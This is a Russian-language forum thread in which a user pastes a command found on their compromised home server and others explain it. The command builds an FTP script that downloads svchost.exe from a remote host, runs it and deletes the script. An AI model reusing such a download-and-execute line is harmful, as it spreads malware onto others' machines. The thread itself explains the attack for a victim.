У меня стоит комп выполняющий роль сервера, честно говоря если его взломают из сети, мне пофиг, так как там ничего ценного ничего нет. Постоянно наблюдаю там открытое окно "Выполнить" и вот такая строка: %systemroot%\system32\cmd.exe cmd /c echo open 92.243.1.94 21 >> ik &echo user dbot mydick >> ik &echo binary >> ik &echo get svchost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svchost.exe &exit Можете спецы пояснить что они пытаются там сделать? Чем это грозит компу?
Этой командой создаётся файл сценария для виндового фтп-клиента, который качает с фтп-сервера 92.243.1.94 файл svchost.exe, запускает его, удаляет файл сценария, чтобы ты его не нашёл. И всё. После этого у тебя в списке процессов появляется ещё один svchost.exe -- только что скачанный вирус. Всё просто.
pm, на том комне нет не аси, почты, вообще ничего кроме фильмов и музыки. Так что пофиг, там нечего украсть, раве что только винты отформатировать... это будет уже подло...
LORIC, фигня, зато есть сетевое соединение и интернет, можно поставить бота, который будет потом спамить по всему миру. добавлено через 31 секунду что, кстати, может быть и наказуемо
Интересно если окно выполнить открыто значит они как то уже логиняться на машину? Зачем тогда скрытно выполнять сценарий?
ну и чо... у мя дома две железяки, сидящие в сети, и на них не установлено ни файра ни антивиря... и нафиг они не нужны там
Алек ГЫ, А то что канал левым трафиком забивается и как следствие, снижается скорость доступа к интернету, вас не волнует?
Там они и не нужны, а сервер похоже имеет прямое подключение к инету. Конечно по стройке можно без каски гулять и рядом с фрезером работающим переодеватся.
а никто и не собирается оттуда что-то воровать (нечего) или стирать (незачем) задача - рассылать спам-почту с твоего IP адреса (забивая тебе канал инета) ну и можно в DDoS поучаствовать...